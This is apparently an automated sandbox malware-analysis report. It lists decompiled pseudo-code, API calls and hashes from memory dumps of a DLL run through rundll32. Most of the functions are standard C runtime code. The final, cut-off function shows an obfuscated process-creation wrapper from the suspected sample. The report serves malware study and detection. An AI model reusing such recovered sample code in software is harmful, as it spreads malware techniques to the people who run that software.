0x6ed36a9c
0x6ed36a9d
0x6ed36aa1
0x6ed36aa4
0x6ed36aa4
0x6ed36aa8
0x6ed36aa8
0x6ed36aa8
0x6ed36aab
0x6ed36aab
0x6ed36863
0x6ed36863
0x6ed36866
0x6ed36868
0x6ed3686b
0x6ed3686d
0x6ed36871
0x6ed36872
0x6ed36873
0x6ed36877
0x6ed3687c
0x6ed36886
0x6ed3688b
0x6ed3688e
0x6ed3688e
0x6ed36891
0x6ed36894
0x6ed36896
0x6ed36899
0x6ed368a2
0x6ed368a6
0x6ed368a7
0x6ed368ae
0x6ed368b4
0x6ed368bc
0x6ed368c7
0x6ed368cc
0x6ed368d7
0x6ed368dc
0x6ed368e2
0x6ed368eb
0x6ed36945
0x6ed36945
0x6ed369d0
0x6ed369d5
0x6ed369e7
0x6ed369ec
0x6ed369ef
0x6ed369f4
0x6ed36a0f
0x6ed36af2
0x6ed36af8
0x6ed36a15
0x6ed36a15
0x6ed36a20
0x6ed36a22
0x6ed36a25
0x6ed36a2e
0x6ed36a38
0x00000000
0x6ed36a3a
0x6ed36a3c
0x6ed36a3e
0x6ed36a57
0x00000000
0x6ed36a5d
0x6ed36a61
0x6ed36a67
0x6ed36a6a
0x6ed36a70
0x6ed36a73
0x00000000
0x6ed36a73
0x6ed36a61
0x6ed36a57
0x6ed36a38
0x6ed36a2e
0x6ed36a0f
0x6ed369f4
0x6ed368e2
0x6ed3685d
0x6ed36833
0x00000000
0x6ed36a76
0x6ed36a76
0x6ed36a7f
0x6ed36afa
0x6ed36aff
0x6ed36b07
0x6ed36b08
0x6ed36b09
0x6ed36b15
0x00000000

APIs

GetConsoleOutputCP.KERNEL32(921D3F26,?,00000000,?), ref: 6ED367AC

Part of subcall function 6ED34073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ED361E2,?,00000000,-00000008), ref: 6ED3411F

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6ED36A07
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6ED36A4F
GetLastError.KERNEL32 ref: 6ED36AF2

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 230d4e7bff4478fa850c1c090be7f93f14aaeed48d8bc5951490be7ecb5eb781
Instruction ID: c6e25cd799eb3f287c68fb5320248d63b00dbacafb411ae16064d33bad9ba320
Opcode Fuzzy Hash: 230d4e7bff4478fa850c1c090be7f93f14aaeed48d8bc5951490be7ecb5eb781
Instruction Fuzzy Hash: B1D15CB5D14669DFDF01CFE8C8809DDBBB5FF4A314F24852AE865AB241D730A942CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2F49F, Relevance: 6.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E6ED2F49F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x6ed6b140);
				E6ED2D350(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E6ED2D4D0(_t107, E6ED2F25D(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E6ED2D4D0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x6ed6e4e4; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x6ed3a154();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E6ED31C23(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x6ed6b160);
									E6ED2D350(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E6ED2F49F(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E6ED3019F(_t103, _t108[0x18], E6ED2F25D( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E6ED301AF(_t103, _t108[0x18], E6ED2F25D( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E6ED2F25D();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x6ed2f49f
0x6ed2f4a1
0x6ed2f4a6
0x6ed2f4ab
0x6ed2f4ad
0x6ed2f4b0
0x6ed2f4b5
0x6ed2f5c5
0x6ed2f5c5
0x6ed2f5c5
0x00000000
0x6ed2f4c4
0x6ed2f4c4
0x6ed2f4c9
0x6ed2f4d3
0x6ed2f4d5
0x6ed2f4da
0x6ed2f4df
0x6ed2f4df
0x6ed2f4e1
0x6ed2f4e4
0x6ed2f4e9
0x6ed2f50b
0x6ed2f50b
0x6ed2f50e
0x6ed2f511
0x6ed2f52f
0x6ed2f532
0x6ed2f571
0x6ed2f574
0x6ed2f577
0x6ed2f59c
0x6ed2f59e
0x00000000
0x6ed2f5a0
0x6ed2f5a0
0x6ed2f5a2
0x00000000
0x6ed2f5a4
0x6ed2f5a4
0x6ed2f5a9
0x6ed2f5ad
0x6ed2f5ad
0x6ed2f5ae
0x00000000
0x6ed2f5ae
0x6ed2f5a2
0x6ed2f579
0x6ed2f579
0x6ed2f57b
0x00000000
0x6ed2f57d
0x6ed2f57d
0x6ed2f57f
0x00000000
0x6ed2f581
0x6ed2f592
0x00000000
0x6ed2f597
0x6ed2f57f
0x6ed2f57b
0x6ed2f534
0x6ed2f534
0x6ed2f538
0x00000000
0x6ed2f53e
0x6ed2f53e
0x6ed2f540
0x00000000
0x6ed2f546
0x6ed2f54d
0x6ed2f555
0x6ed2f559
0x6ed2f55b
0x6ed2f55e
0x6ed2f563
0x6ed2f564
0x00000000
0x6ed2f564
0x6ed2f55e
0x00000000
0x6ed2f559
0x6ed2f540
0x6ed2f538
0x6ed2f513
0x6ed2f513
0x00000000
0x6ed2f513
0x6ed2f4f0
0x6ed2f4f0
0x6ed2f4f5
0x6ed2f4fa
0x00000000
0x6ed2f4fc
0x6ed2f4fe
0x6ed2f507
0x6ed2f516
0x6ed2f518
0x6ed2f5d7
0x6ed2f5d7
0x6ed2f5dc
0x6ed2f5dd
0x6ed2f5df
0x6ed2f5e4
0x6ed2f5e9
0x6ed2f5ec
0x6ed2f5ef
0x6ed2f5f2
0x6ed2f5fb
0x6ed2f5fb
0x6ed2f5f4
0x6ed2f5f4
0x6ed2f5f4
0x6ed2f5fe
0x6ed2f602
0x6ed2f605
0x6ed2f606
0x6ed2f607
0x6ed2f608
0x6ed2f60b
0x6ed2f614
0x6ed2f614
0x6ed2f617
0x6ed2f64d
0x6ed2f619
0x6ed2f619
0x6ed2f619
0x6ed2f61c
0x6ed2f633
0x6ed2f633
0x6ed2f61c
0x6ed2f652
0x6ed2f65c
0x6ed2f668
0x6ed2f526
0x6ed2f526
0x6ed2f52b
0x6ed2f52c
0x6ed2f566
0x6ed2f56d
0x6ed2f5b1
0x6ed2f5b1
0x6ed2f5b8
0x6ed2f5c7
0x6ed2f5ca
0x6ed2f5d6
0x6ed2f5d6
0x6ed2f518
0x6ed2f4fa
0x00000000
0x00000000
0x00000000
0x6ed2f4c9

APIs

___AdjustPointer.LIBCMT ref: 6ED2F566
___AdjustPointer.LIBCMT ref: 6ED2F589
___AdjustPointer.LIBCMT ref: 6ED2F625

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: f6072b8e8bbd484df1180bc72d98d998aebebd095cdf1937feb69c0d598cc481
Instruction ID: 2d89f324655b640c0a12a00200e31abdff026b2f2e735822fc9d39d8c3884cc9
Opcode Fuzzy Hash: f6072b8e8bbd484df1180bc72d98d998aebebd095cdf1937feb69c0d598cc481
Instruction Fuzzy Hash: F351B372505606EFEB158FA0D450BAA73A5FF4531CF304D3DDA55A7294EB31E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED32D87, Relevance: 6.1, APIs: 4, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED32D87(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t30;
				char _t32;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;

				_t42 = _a4;
				if(_t42 != 0) {
					_t32 = 0;
					__eflags =  *_t42;
					if( *_t42 != 0) {
						_t17 = E6ED34073(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t17;
						if(_t17 != 0) {
							_t40 = _a8;
							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t18 = E6ED333C8(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
								__eflags = _t18;
								if(_t18 != 0) {
									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
									_t20 = 0;
									__eflags = 0;
								} else {
									E6ED31F75(GetLastError());
									_t20 =  *((intOrPtr*)(E6ED31FCF()));
								}
								L14:
								return _t20;
							}
							_t20 = E6ED33445(_t40, __eflags, _t17);
							__eflags = _t20;
							if(_t20 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6ED31F75(GetLastError());
						return  *((intOrPtr*)(E6ED31FCF()));
					}
					_t43 = _a8;
					__eflags =  *((intOrPtr*)(_t43 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
						L2:
						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
						return 0;
					}
					_t30 = E6ED33445(_t43, __eflags, 1);
					__eflags = _t30;
					if(_t30 != 0) {
						return _t30;
					}
					goto L6;
				}
				_t43 = _a8;
				E6ED3342B(_t43);
				_t32 = 0;
				 *((intOrPtr*)(_t43 + 8)) = 0;
				 *((intOrPtr*)(_t43 + 0xc)) = 0;
				goto L2;
			}

0x6ed32d8e
0x6ed32d93
0x6ed32db1
0x6ed32db3
0x6ed32db6
0x6ed32ddf
0x6ed32de7
0x6ed32de9
0x6ed32e02
0x6ed32e05
0x6ed32e08
0x6ed32e16
0x6ed32e23
0x6ed32e28
0x6ed32e2a
0x6ed32e43
0x6ed32e46
0x6ed32e46
0x6ed32e2c
0x6ed32e33
0x6ed32e3e
0x6ed32e3e
0x6ed32e48
0x00000000
0x6ed32e48
0x6ed32e0d
0x6ed32e12
0x6ed32e14
0x00000000
0x00000000
0x00000000
0x6ed32e14
0x6ed32df2
0x00000000
0x6ed32dfd
0x6ed32db8
0x6ed32dbb
0x6ed32dbe
0x6ed32dcd
0x6ed32dd0
0x6ed32da7
0x6ed32da7
0x00000000
0x6ed32daa
0x6ed32dc4
0x6ed32dc9
0x6ed32dcb
0x6ed32e4c
0x6ed32e4c
0x00000000
0x6ed32dcb
0x6ed32d95
0x6ed32d9a
0x6ed32d9f
0x6ed32da1
0x6ed32da4
0x00000000

APIs

Part of subcall function 6ED34073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ED361E2,?,00000000,-00000008), ref: 6ED3411F

GetLastError.KERNEL32 ref: 6ED32DEB
__dosmaperr.LIBCMT ref: 6ED32DF2
GetLastError.KERNEL32(?,?,?,?), ref: 6ED32E2C
__dosmaperr.LIBCMT ref: 6ED32E33

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 73b0008459ea5fd794a683ed431d3f9040784454ea4c3e6baf6ff8fa7bbb2fe1
Instruction ID: e9ddeb5971d280e136d335934afff413e0cf60602a0e80cc3f109edf58934a16
Opcode Fuzzy Hash: 73b0008459ea5fd794a683ed431d3f9040784454ea4c3e6baf6ff8fa7bbb2fe1
Instruction Fuzzy Hash: 52219571A04625EF9B519FE6DC8189BB7BDEF4336C7208929E854A7154D730EC4187E0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED37EA6, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED37EA6(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6ed6e050, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6ED37E8F();
					E6ED37E51();
					_t13 = WriteConsoleW( *0x6ed6e050, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6ed37ec3
0x6ed37ec7
0x6ed37ed4
0x6ed37ed9
0x6ed37ef4
0x6ed37ef4
0x6ed37efa

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6ED37857,?,00000001,?,?,?,6ED36B46,?,?,00000000), ref: 6ED37EBD
GetLastError.KERNEL32(?,6ED37857,?,00000001,?,?,?,6ED36B46,?,?,00000000,?,?,?,6ED370CD,?), ref: 6ED37EC9

Part of subcall function 6ED37E8F: CloseHandle.KERNEL32(FFFFFFFE,6ED37ED9,?,6ED37857,?,00000001,?,?,?,6ED36B46,?,?,00000000,?,?), ref: 6ED37E9F

___initconout.LIBCMT ref: 6ED37ED9

Part of subcall function 6ED37E51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6ED37E80,6ED37844,?,?,6ED36B46,?,?,00000000,?), ref: 6ED37E64

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6ED37857,?,00000001,?,?,?,6ED36B46,?,?,00000000,?), ref: 6ED37EEE

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: e72aba5166b914db9ae2a74d75dd9f01b4cd16ba8099e184ba010fe624616525
Instruction ID: 6cb4710687ae05c3a0623d5b2691d5ff4dafac4752119416e2aa3a65125af6c4
Opcode Fuzzy Hash: e72aba5166b914db9ae2a74d75dd9f01b4cd16ba8099e184ba010fe624616525
Instruction Fuzzy Hash: DBF0F236100A29FBDF621FD18C08A9E3F26EB0B7A4F114411FE18A55A0D732CD619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2FAA0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6ED2FAA0(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E6ED2F3B1(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E6ED2F3B1(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6ED2EBF7(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E6ED2EB2A(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6ED2F676(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6ED31C23(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x6ed2faa0
0x6ed2faa0
0x6ed2faa7
0x6ed2fab0
0x6ed2fbcf
0x6ed2fab6
0x6ed2fab6
0x6ed2fab7
0x6ed2fab8
0x6ed2fac2
0x6ed2fac5
0x6ed2facb
0x6ed2fad5
0x6ed2fafa
0x6ed2faff
0x6ed2fb04
0x6ed2fbcb
0x00000000
0x6ed2fbcc
0x6ed2fb04
0x6ed2fad5
0x6ed2fb0a
0x6ed2fb0d
0x6ed2fb10
0x6ed2fb16
0x6ed2fb1c
0x6ed2fb2e
0x6ed2fb33
0x6ed2fb36
0x6ed2fb39
0x6ed2fb3c
0x6ed2fb3f
0x6ed2fb45
0x6ed2fb4b
0x6ed2fb4e
0x6ed2fb51
0x6ed2fb60
0x6ed2fb61
0x6ed2fb61
0x6ed2fb66
0x6ed2fb79
0x6ed2fb7b
0x6ed2fb80
0x6ed2fb8b
0x6ed2fb8d
0x6ed2fb8f
0x6ed2fbab
0x6ed2fbb0
0x6ed2fbb3
0x6ed2fbb3
0x6ed2fb8b
0x6ed2fb80
0x6ed2fbb9
0x6ed2fbba
0x6ed2fbbd
0x6ed2fbc0
0x6ed2fbc3
0x6ed2fbc6
0x6ed2fb51
0x00000000
0x6ed2fb45
0x6ed2fbd0
0x6ed2fbd5
0x6ed2fbd9
0x6ed2fbdc
0x6ed2fbdd
0x6ed2fbde
0x6ed2fbdf
0x6ed2fbe4
0x6ed2fc5c
0x6ed2fc5e
0x6ed2fbe6
0x6ed2fbe6
0x6ed2fbec
0x00000000
0x6ed2fbee
0x6ed2fbf1
0x6ed2fbf4
0x6ed2fbfb
0x6ed2fbfe
0x6ed2fc02
0x6ed2fc34
0x6ed2fc37
0x6ed2fc3e
0x6ed2fc44
0x6ed2fc4e
0x6ed2fc57
0x6ed2fc57
0x6ed2fc4e
0x6ed2fc44
0x6ed2fc58
0x6ed2fc04
0x6ed2fc04
0x6ed2fc04
0x6ed2fc07
0x6ed2fc07
0x6ed2fc0b
0x00000000
0x00000000
0x6ed2fc0f
0x6ed2fc23
0x6ed2fc23
0x6ed2fc11
0x6ed2fc11
0x6ed2fc17
0x00000000
0x6ed2fc19
0x6ed2fc19
0x6ed2fc1c
0x6ed2fc21
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed2fc21
0x6ed2fc17
0x6ed2fc2c
0x6ed2fc2e
0x00000000
0x6ed2fc30
0x6ed2fc30
0x6ed2fc30
0x00000000
0x6ed2fc2e
0x6ed2fc27
0x6ed2fc29
0x00000000
0x6ed2fc29
0x00000000
0x00000000
0x00000000
0x6ed2fbf4
0x6ed2fbec
0x6ed2fc5f
0x6ed2fc63
0x6ed2fc63

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6ED2FAC5

Strings

MOC, xrefs: 6ED2FAD7
RCC, xrefs: 6ED2FADF

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 95314b9a3cc01cd95822b2efdb880ca393181c9e152b1b01ba63e1a01d8e7046
Instruction ID: 1bad0b55787540b037693321b0fd026d3c384492a597ececdc2e4a0837b1988e
Opcode Fuzzy Hash: 95314b9a3cc01cd95822b2efdb880ca393181c9e152b1b01ba63e1a01d8e7046
Instruction Fuzzy Hash: FF413772900209EFDF06CF94C990ADE7BB9FF48308F2488A9EA1576250D336D951DB61

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 5696 Parent PID: 4520 rundll32.exeCOMMON

Executed Functions

Function 007B9100, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E007B9100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t52;
				int _t60;
				WCHAR* _t64;

				_t64 = __edx;
				_push(0);
				_push(0);
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E007A8002(_t52);
				_v28 = 0x2905a5;
				_v24 = 0;
				_v12 = 0xa2d8b8;
				_v12 = _v12 + 0xfffff871;
				_v12 = _v12 ^ 0x5b121ec8;
				_v12 = _v12 ^ 0x21b4fd5f;
				_v12 = _v12 ^ 0x7a067dbd;
				_v8 = 0x36027e;
				_v8 = _v8 ^ 0x6c06375b;
